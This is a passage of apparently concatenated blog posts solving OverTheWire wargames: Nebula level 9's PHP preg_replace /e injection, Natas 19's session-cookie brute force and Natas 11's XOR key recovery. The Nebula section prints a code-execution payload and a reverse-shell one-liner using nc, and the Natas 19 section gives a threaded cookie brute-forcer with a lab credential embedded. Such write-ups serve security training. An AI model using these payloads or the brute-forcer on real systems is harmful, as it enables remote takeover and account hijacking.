<p>Then you can login to flag08 with this password and execute <code>getflag</code>.</p>
<h2>Level 9 - The evil <code>/e</code> in PHP regular expressions: e(PREG_REPLACE_EVAL)</h2>
<p>We have a PHP script that is probably executed by the <code>flag09</code> binary in <code>/home/flag09</code>.</p>
<p>The script contains the following code:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?php</span>
<span class="k">function</span> <span class="nf">spam</span><span class="p">(</span><span class="nv">$email</span><span class="p">)</span>
<span class="p">{</span>
<span class="nv">$email</span> <span class="o">=</span> <span class="nb">preg_replace</span><span class="p">(</span><span class="s2">"/\./"</span><span class="p">,</span> <span class="s2">" dot "</span><span class="p">,</span> <span class="nv">$email</span><span class="p">);</span>
<span class="nv">$email</span> <span class="o">=</span> <span class="nb">preg_replace</span><span class="p">(</span><span class="s2">"/@/"</span><span class="p">,</span> <span class="s2">" AT "</span><span class="p">,</span> <span class="nv">$email</span><span class="p">);</span>
<span class="k">return</span> <span class="nv">$email</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">markup</span><span class="p">(</span><span class="nv">$filename</span><span class="p">,</span> <span class="nv">$use_me</span><span class="p">)</span>
<span class="p">{</span>
<span class="nv">$contents</span> <span class="o">=</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="nv">$filename</span><span class="p">);</span>
<span class="nv">$contents</span> <span class="o">=</span> <span class="nb">preg_replace</span><span class="p">(</span><span class="s2">"/(\[email (.*)\])/e"</span><span class="p">,</span> <span class="s2">"spam(</span><span class="se">\"\\</span><span class="s2">2</span><span class="se">\"</span><span class="s2">)"</span><span class="p">,</span> <span class="nv">$contents</span><span class="p">);</span>
<span class="nv">$contents</span> <span class="o">=</span> <span class="nb">preg_replace</span><span class="p">(</span><span class="s2">"/\[/"</span><span class="p">,</span> <span class="s2">"<"</span><span class="p">,</span> <span class="nv">$contents</span><span class="p">);</span>
<span class="nv">$contents</span> <span class="o">=</span> <span class="nb">preg_replace</span><span class="p">(</span><span class="s2">"/\]/"</span><span class="p">,</span> <span class="s2">">"</span><span class="p">,</span> <span class="nv">$contents</span><span class="p">);</span>
<span class="k">return</span> <span class="nv">$contents</span><span class="p">;</span>
<span class="p">}</span>
<span class="nv">$output</span> <span class="o">=</span> <span class="nx">markup</span><span class="p">(</span><span class="nv">$argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nv">$argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
<span class="k">print</span> <span class="nv">$output</span><span class="p">;</span>
<span class="cp">?></span><span class="x"></span>
</code></pre></div>
<p>This was also a very nice level. And the code has even a variable named <code>$use_me</code> that helps in
exploiting the bug. </p>
<p>To exploit it, I created a file named <code>/tmp/testfile</code> with the below contents. Then I proceeded to call the setuid binary:</p>
<div class="highlight"><pre><span></span><code>level09@nebula:/home/flag09$ cat /tmp/testfile
<span class="o">[</span>email <span class="o">{</span><span class="si">${</span><span class="nv">eval</span><span class="p">(system(</span><span class="nv">$use_me</span><span class="p">))</span><span class="si">}</span><span class="o">}]</span>
level09@nebula:/home/flag09$ ./flag09 /tmp/testfile <span class="s1">'getflag > /tmp/flagged'</span>
PHP Notice: Undefined variable: <span class="k">in</span> /home/flag09/flag09.php<span class="o">(</span><span class="m">15</span><span class="o">)</span> : regexp code on line <span class="m">1</span>
level09@nebula:/home/flag09$ cat /tmp/flagged
You have successfully executed getflag on a target account
</code></pre></div>
<p>How it works: First for the basic understanding read <a href="http://php.net/manual/en/reference.pcre.pattern.modifiers.php">http://php.net/manual/en/reference.pcre.pattern.modifiers.php</a>.</p>
<p>After having read it, we know that every matched group in the pattern in <code>preg_replace()</code> is called with the spam function.
But we control what parameter is passed to <code>spam()</code> with the reference <code>\2</code>.</p>
<p>So we can just call a bash command through php with a function like <code>system()</code>. There we make use of the second parameter <code>$use_me</code>.</p>
<p>For a POC, I just redirected the
contents of <code>getflag</code> to the file <code>/tmp/flagged</code>. But of course we could execute any command, like opening a backdoor shell with
a <code>$use_me</code> parameter like: <code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f</code></p>Solution for wargame natas192015-09-15T10:59:00+02:002015-09-15T10:59:00+02:00Nikolai Tschachertag:incolumitas.com,2015-09-15:/2015/09/15/solution-for-wargame-natas19/<h2>Hi everyone</h2>
<p>I am still trying to solve wargames on
<a href="http://overthewire.org">overthewire</a>. Level 19 proofed to be very
similar to level 18, where server side code looks something like the
following:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?</span>
<span class="nv">$maxid</span> <span class="o">=</span> <span class="mi">640</span><span class="p">;</span> <span class="c1">// 640 should be enough for everyone</span>
<span class="k">function</span> <span class="nf">isValidAdminLogin</span><span class="p">()</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">"username"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"admin"</span><span class="p">)</span> <span class="p">{</span>
<span class="cm">/* This method of authentication appears to be unsafe and has been disabled for now. */</span>
<span class="c1">//return 1;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">isValidID</span><span class="p">(</span><span class="nv">$id</span><span class="p">)</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">return</span> <span class="nb">is_numeric</span><span class="p">(</span><span class="nv">$id</span><span class="p">);</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">createID</span><span class="p">(</span><span class="nv">$user</span><span class="p">)</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">global</span> <span class="nv">$maxid</span><span class="p">;</span>
<span class="k">return</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="nv">$maxid</span><span class="p">);</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">debug</span><span class="p">(</span><span class="nv">$msg</span><span class="p">)</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"debug"</span><span class="p">,</span> <span class="nv">$_GET</span><span class="p">))</span> <span class="p">{</span>
<span class="k">print</span> <span class="s2">"DEBUG: </span><span class="si">$msg</span><span class="s2">"</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">my_session_start</span><span class="p">()</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"PHPSESSID"</span><span class="p">,</span> <span class="nv">$_COOKIE</span><span class="p">)</span> <span class="k">and</span> <span class="nx">isValidID</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s2">"PHPSESSID"</span><span class="p">]))</span> <span class="p">{</span>
<span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">session_start</span><span class="p">())</span> <span class="p">{</span>
<span class="nx">debug</span><span class="p">(</span><span class="s2">"Session start failed"</span><span class="p">);</span>
<span class="k">return</span> <span class="k">false</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">debug</span><span class="p">(</span><span class="s2">"Session start ok"</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"admin"</span><span class="p">,</span> <span class="nv">$_SESSION</span><span class="p">))</span> <span class="p">{</span>
<span class="nx">debug</span><span class="p">(</span><span class="s2">"Session was old: admin flag set"</span><span class="p">);</span>
<span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"admin"</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// backwards compatible, secure</span>
<span class="p">}</span>
<span class="k">return</span> <span class="k">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="k">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">print_credentials</span><span class="p">()</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$_SESSION</span> <span class="k">and</span> <span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"admin"</span><span class="p">,</span> <span class="nv">$_SESSION</span><span class="p">)</span> <span class="k">and</span> <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"admin"</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="k">print</span> <span class="s2">"You are an admin. The credentials for the next level are:"</span><span class="p">;</span>
<span class="k">print</span> <span class="s2">"Username: natas19n"</span><span class="p">;</span>
<span class="k">print</span> <span class="s2">"Password: "</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">print</span> <span class="s2">"You are logged in as a regular user. Login as an admin to retrieve credentials for natas19."</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="nv">$showform</span> <span class="o">=</span> <span class="k">true</span><span class="p">;</span>
<span class="k">if</span><span class="p">(</span><span class="nx">my_session_start</span><span class="p">())</span> <span class="p">{</span>
<span class="nx">print_credentials …</span></code></pre></div><h2>Hi everyone</h2>
<p>I am still trying to solve wargames on
<a href="http://overthewire.org">overthewire</a>. Level 19 proofed to be very
similar to level 18, where server side code looks something like the
following:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?</span>
<span class="nv">$maxid</span> <span class="o">=</span> <span class="mi">640</span><span class="p">;</span> <span class="c1">// 640 should be enough for everyone</span>
<span class="k">function</span> <span class="nf">isValidAdminLogin</span><span class="p">()</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">"username"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"admin"</span><span class="p">)</span> <span class="p">{</span>
<span class="cm">/* This method of authentication appears to be unsafe and has been disabled for now. */</span>
<span class="c1">//return 1;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">isValidID</span><span class="p">(</span><span class="nv">$id</span><span class="p">)</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">return</span> <span class="nb">is_numeric</span><span class="p">(</span><span class="nv">$id</span><span class="p">);</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">createID</span><span class="p">(</span><span class="nv">$user</span><span class="p">)</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">global</span> <span class="nv">$maxid</span><span class="p">;</span>
<span class="k">return</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="nv">$maxid</span><span class="p">);</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">debug</span><span class="p">(</span><span class="nv">$msg</span><span class="p">)</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"debug"</span><span class="p">,</span> <span class="nv">$_GET</span><span class="p">))</span> <span class="p">{</span>
<span class="k">print</span> <span class="s2">"DEBUG: </span><span class="si">$msg</span><span class="s2">"</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">my_session_start</span><span class="p">()</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"PHPSESSID"</span><span class="p">,</span> <span class="nv">$_COOKIE</span><span class="p">)</span> <span class="k">and</span> <span class="nx">isValidID</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s2">"PHPSESSID"</span><span class="p">]))</span> <span class="p">{</span>
<span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">session_start</span><span class="p">())</span> <span class="p">{</span>
<span class="nx">debug</span><span class="p">(</span><span class="s2">"Session start failed"</span><span class="p">);</span>
<span class="k">return</span> <span class="k">false</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">debug</span><span class="p">(</span><span class="s2">"Session start ok"</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"admin"</span><span class="p">,</span> <span class="nv">$_SESSION</span><span class="p">))</span> <span class="p">{</span>
<span class="nx">debug</span><span class="p">(</span><span class="s2">"Session was old: admin flag set"</span><span class="p">);</span>
<span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"admin"</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// backwards compatible, secure</span>
<span class="p">}</span>
<span class="k">return</span> <span class="k">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="k">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="k">function</span> <span class="nf">print_credentials</span><span class="p">()</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$_SESSION</span> <span class="k">and</span> <span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"admin"</span><span class="p">,</span> <span class="nv">$_SESSION</span><span class="p">)</span> <span class="k">and</span> <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"admin"</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="k">print</span> <span class="s2">"You are an admin. The credentials for the next level are:"</span><span class="p">;</span>
<span class="k">print</span> <span class="s2">"Username: natas19n"</span><span class="p">;</span>
<span class="k">print</span> <span class="s2">"Password: "</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">print</span> <span class="s2">"You are logged in as a regular user. Login as an admin to retrieve credentials for natas19."</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="cm">/* }}} */</span>
<span class="nv">$showform</span> <span class="o">=</span> <span class="k">true</span><span class="p">;</span>
<span class="k">if</span><span class="p">(</span><span class="nx">my_session_start</span><span class="p">())</span> <span class="p">{</span>
<span class="nx">print_credentials</span><span class="p">();</span>
<span class="nv">$showform</span> <span class="o">=</span> <span class="k">false</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"username"</span><span class="p">,</span> <span class="nv">$_REQUEST</span><span class="p">)</span> <span class="o">&&</span>
<span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"password"</span><span class="p">,</span> <span class="nv">$_REQUEST</span><span class="p">))</span> <span class="p">{</span>
<span class="nb">session_id</span><span class="p">(</span><span class="nx">createID</span><span class="p">(</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">"username"</span><span class="p">]));</span>
<span class="nb">session_start</span><span class="p">();</span>
<span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"admin"</span><span class="p">]</span> <span class="o">=</span> <span class="nx">isValidAdminLogin</span><span class="p">();</span>
<span class="nx">debug</span><span class="p">(</span><span class="s2">"New session started"</span><span class="p">);</span>
<span class="nv">$showform</span> <span class="o">=</span> <span class="k">false</span><span class="p">;</span>
<span class="nx">print_credentials</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$showform</span><span class="p">)</span> <span class="p">{</span>
<span class="cp">?></span><span class="x"></span>
<span class="x">Please login with your admin account to retrieve credentials for</span>
<span class="x">natas19.</span>
<span class="x"><form action="index.php" method="POST"></span>
<span class="x">Username: <input name="username"></span>
<span class="x">Password: <input name="password"></span>
<span class="x"><input type="submit" value="Login"></input></span>
<span class="x"></form></span>
<span class="cp"><?</span> <span class="p">}</span> <span class="cp">?></span><span class="x"></span>
</code></pre></div>
<p>Assuming register_globals are off in the php.ini, we cannot really
inject some values to alter the logic of the code. Furthermore
<code>isValidAdminLogin()</code> always returns 0 and never 1, which is our aim.
But we immediately see that admin cookies are generated in a fixed,
small range: </p>
<p><code>function createID($user) { /* {{{ */ global $maxid; // maxid = 640 return rand(1, $maxid); }</code></p>
<p>So we can just try brute forcing all cookies from 1 to 640 and we will
soon be admin.</p>
<p>Now level19 has a very similar code, but the cookie is generated
slightly more complex: First I tried some login attempts with different username/password
combinations:</p>
<p><code>blabla:blabla -> PHPSESSID=3235392d 626c61 626c61; path=/; HttpOnly blublu:blublu -> PHPSESSID=3436382d 626c75 626c75; path=/; HttpOnly admin:AAAAAAAAAAAA -> PHPSESSID=3538322d 61646d696e; path=/; HttpOnly</code></p>
<p>We see that the last bytes seem to look like hex values. We can decode
this with python:</p>
<p><code>''.join([chr(i) for i in (0x62, 0x6c, 0x61)]) == 'bla' ''.join([chr(i) for i in (0x61, 0x64, 0x6d, 0x69, 0x6e)]) == 'admin'</code></p>
<p>Assuming the valid ID's are still in the range 1-640, I need to figure
out where the id is hidden in the cookie. Seems like the username ist
just appended at the end of the cookie as ascii string. So we need to
set it to '61646d696e' for admin. The first three bytes are probably the
ID, because the ascii values are all numbers.</p>
<p>Overall cookie format:<br>
<code>NUM NUM NUM HYPHEN/- USERNAME</code></p>
<p>Examples without ASCII encoding:<br>
<code>123-admin 001-admin 012-admin 640-admin</code></p>
<p>The solution to crack the code:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python</span>
<span class="sd">"""</span>
<span class="sd">blabla:blabla -> PHPSESSID=3235392d 626c61 626c61; path=/; HttpOnly</span>
<span class="sd">blublu:blublu -> PHPSESSID=3436382d 626c75 626c75; path=/; HttpOnly</span>
<span class="sd">admin:AAAAAAAAAAAA -> PHPSESSID=3538322d 61646d696e; path=/; HttpOnly</span>
<span class="sd">We see that the last bytes seem to look like hex values:</span>
<span class="sd">''.join([chr(i) for i in (0x62, 0x6c, 0x61)]) == 'bla'</span>
<span class="sd">''.join([chr(i) for i in (0x61, 0x64, 0x6d, 0x69, 0x6e)]) == 'admin'</span>
<span class="sd">Assuming the valid ID's are still in the range 1-640, I need to figure </span>
<span class="sd">out where the id is hidden in the cookie. Seems like the username ist just </span>
<span class="sd">appended at the end of the cookie as ascii string. So we need to set it to </span>
<span class="sd">'61646d696e' for admin. The first three bytes are probably the ID, because</span>
<span class="sd">the ascii values are all numbers.</span>
<span class="sd">Format:</span>
<span class="sd">NUM NUM NUM HYPHEN/- USERNAME</span>
<span class="sd">Examples without ASCII encoding:</span>
<span class="sd">123-admin</span>
<span class="sd">001-admin</span>
<span class="sd">012-admin</span>
<span class="sd">640-admin</span>
<span class="sd">"""</span>
<span class="kn">import</span> <span class="nn">threading</span>
<span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">binascii</span>
<span class="n">DEBUG</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">class</span> <span class="nc">Bruter</span><span class="p">(</span><span class="n">threading</span><span class="o">.</span><span class="n">Thread</span><span class="p">):</span>
<span class="n">username</span> <span class="o">=</span> <span class="s1">'admin'</span>
<span class="n">url</span> <span class="o">=</span> <span class="s1">'http://natas19.natas.labs.overthewire.org/index.php'</span>
<span class="n">headers</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'Authorization'</span><span class="p">:</span> <span class="s1">'Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw=='</span><span class="p">,</span>
<span class="p">}</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="nb">super</span><span class="p">(</span><span class="n">Bruter</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="fm">__init__</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">sids</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">def</span> <span class="nf">stoa</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
<span class="k">return</span> <span class="n">binascii</span><span class="o">.</span><span class="n">hexlify</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">value</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">for</span> <span class="nb">id</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">sids</span><span class="p">:</span>
<span class="n">session_id</span> <span class="o">=</span> <span class="s1">'PHPSESSID='</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">stoa</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="nb">id</span><span class="p">)</span><span class="o">.</span><span class="n">zfill</span><span class="p">(</span><span class="mi">3</span><span class="p">))</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">stoa</span><span class="p">(</span><span class="s1">'-'</span><span class="p">)</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">stoa</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">username</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">headers</span><span class="p">[</span><span class="s1">'Cookie'</span><span class="p">]</span> <span class="o">=</span> <span class="n">session_id</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">url</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="bp">self</span><span class="o">.</span><span class="n">headers</span><span class="p">)</span><span class="o">.</span><span class="n">text</span>
<span class="k">if</span> <span class="n">DEBUG</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[i] Requesting with sid </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">session_id</span><span class="p">))</span>
<span class="k">if</span> <span class="s1">'You are logged in as a regular user.'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">response</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[!] Got something: '</span> <span class="o">+</span> <span class="n">session_id</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">response</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="c1"># lets spawn 10 threads</span>
<span class="n">threads</span> <span class="o">=</span> <span class="p">[</span><span class="n">Bruter</span><span class="p">()</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">10</span><span class="p">)]</span>
<span class="k">for</span> <span class="n">sid</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">641</span><span class="p">):</span>
<span class="n">threads</span><span class="p">[</span><span class="n">sid</span><span class="o">%</span><span class="mi">10</span><span class="p">]</span><span class="o">.</span><span class="n">sids</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">sid</span><span class="p">)</span>
<span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">threads</span><span class="p">:</span>
<span class="n">t</span><span class="o">.</span><span class="n">start</span><span class="p">()</span>
<span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">threads</span><span class="p">:</span>
<span class="n">t</span><span class="o">.</span><span class="n">join</span><span class="p">()</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>Solution for Natas11 for natas wargame on overthewire.org2015-09-10T15:57:00+02:002015-09-10T15:57:00+02:00Nikolai Tschachertag:incolumitas.com,2015-09-10:/2015/09/10/solution-for-natas11-for-natas-wargame-on-overthewire-org/<h3>Solution for Natas web security wargame with by XORing the plaintext with the ciphertext...</h3>
<p>Currently I am playing some wargames on
<a href="http://overthewire.org/wargames/">overthewire.org</a>.</p>
<p>The first 10 levels were very easy and everyone with some technical
knowledge and programming experience should be able to solve them. But
somehow I got stuck for a few hours on level 11. The task is to modify a
XOR encrypted cookie. For some reason I couldn't figure out how to
obtain the xor key that was used.</p>
<p>The challenge was to reverse engineer the key by having the plaintext
and the ciphertext. Of course I should have realized very quickly that
xoring the plaintext with the ciphertext yields us back the key. But why
is this so? Consider the following math: </p>
<p><code>plaintext xor ciphertext == key <=> plaintext xor (plaintext xor key) <=> plaintext xor plaintext xor key <=> 00000... xor key == key</code></p>
<p>As you can see, the plaintext cancels out. If the plaintext would be a
single byte, say, 1100 1101, then XORing this byte with itself yields:<br>
<code>1100 1101 XOR 1100 1101 -------- 0000 0000</code></p>
<p>To finally get to solution of the wargame, you can safe the following
file as a PHP file and run it:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?php</span>
<span class="k">function …</span></code></pre></div><h3>Solution for Natas web security wargame with by XORing the plaintext with the ciphertext...</h3>
<p>Currently I am playing some wargames on
<a href="http://overthewire.org/wargames/">overthewire.org</a>.</p>
<p>The first 10 levels were very easy and everyone with some technical
knowledge and programming experience should be able to solve them. But
somehow I got stuck for a few hours on level 11. The task is to modify a
XOR encrypted cookie. For some reason I couldn't figure out how to
obtain the xor key that was used.</p>
<p>The challenge was to reverse engineer the key by having the plaintext
and the ciphertext. Of course I should have realized very quickly that
xoring the plaintext with the ciphertext yields us back the key. But why
is this so? Consider the following math: </p>
<p><code>plaintext xor ciphertext == key <=> plaintext xor (plaintext xor key) <=> plaintext xor plaintext xor key <=> 00000... xor key == key</code></p>
<p>As you can see, the plaintext cancels out. If the plaintext would be a
single byte, say, 1100 1101, then XORing this byte with itself yields:<br>
<code>1100 1101 XOR 1100 1101 -------- 0000 0000</code></p>
<p>To finally get to solution of the wargame, you can safe the following
file as a PHP file and run it:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?php</span>
<span class="k">function</span> <span class="nf">xor_encrypt</span><span class="p">(</span><span class="nv">$text</span><span class="p">,</span> <span class="nv">$key</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$outText</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
<span class="c1">// Iterate through each character</span>
<span class="k">for</span><span class="p">(</span><span class="nv">$i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nv">$i</span><span class="o"><</span><span class="nb">strlen</span><span class="p">(</span><span class="nv">$text</span><span class="p">);</span><span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$outText</span> <span class="o">.=</span> <span class="nv">$text</span><span class="p">[</span><span class="nv">$i</span><span class="p">]</span> <span class="o">^</span> <span class="nv">$key</span><span class="p">[</span><span class="nv">$i</span> <span class="o">%</span> <span class="nb">strlen</span><span class="p">(</span><span class="nv">$key</span><span class="p">)];</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$outText</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">decodeData</span><span class="p">(</span><span class="nv">$data</span><span class="p">,</span> <span class="nv">$key</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nb">json_decode</span><span class="p">(</span><span class="nx">xor_encrypt</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$data</span><span class="p">),</span> <span class="nv">$key</span><span class="p">),</span> <span class="k">true</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">encodeData</span><span class="p">(</span><span class="nv">$data</span><span class="p">,</span> <span class="nv">$key</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nb">base64_encode</span><span class="p">(</span><span class="nx">xor_encrypt</span><span class="p">(</span><span class="nb">json_encode</span><span class="p">(</span><span class="nv">$data</span><span class="p">),</span> <span class="nv">$key</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">encodeData2</span><span class="p">(</span><span class="nv">$data</span><span class="p">,</span> <span class="nv">$key</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nb">base64_encode</span><span class="p">(</span><span class="nx">xor_encrypt</span><span class="p">(</span><span class="nv">$data</span><span class="p">,</span> <span class="nv">$key</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">xstrings</span><span class="p">(</span><span class="nv">$s1</span><span class="p">,</span> <span class="nv">$s2</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">strlen</span><span class="p">(</span><span class="nv">$s1</span><span class="p">)</span> <span class="o">!=</span> <span class="nb">strlen</span><span class="p">(</span><span class="nv">$s2</span><span class="p">))</span> <span class="p">{</span>
<span class="k">print</span> <span class="s1">'Strings must be equal in length!'</span><span class="p">;</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="nv">$res</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
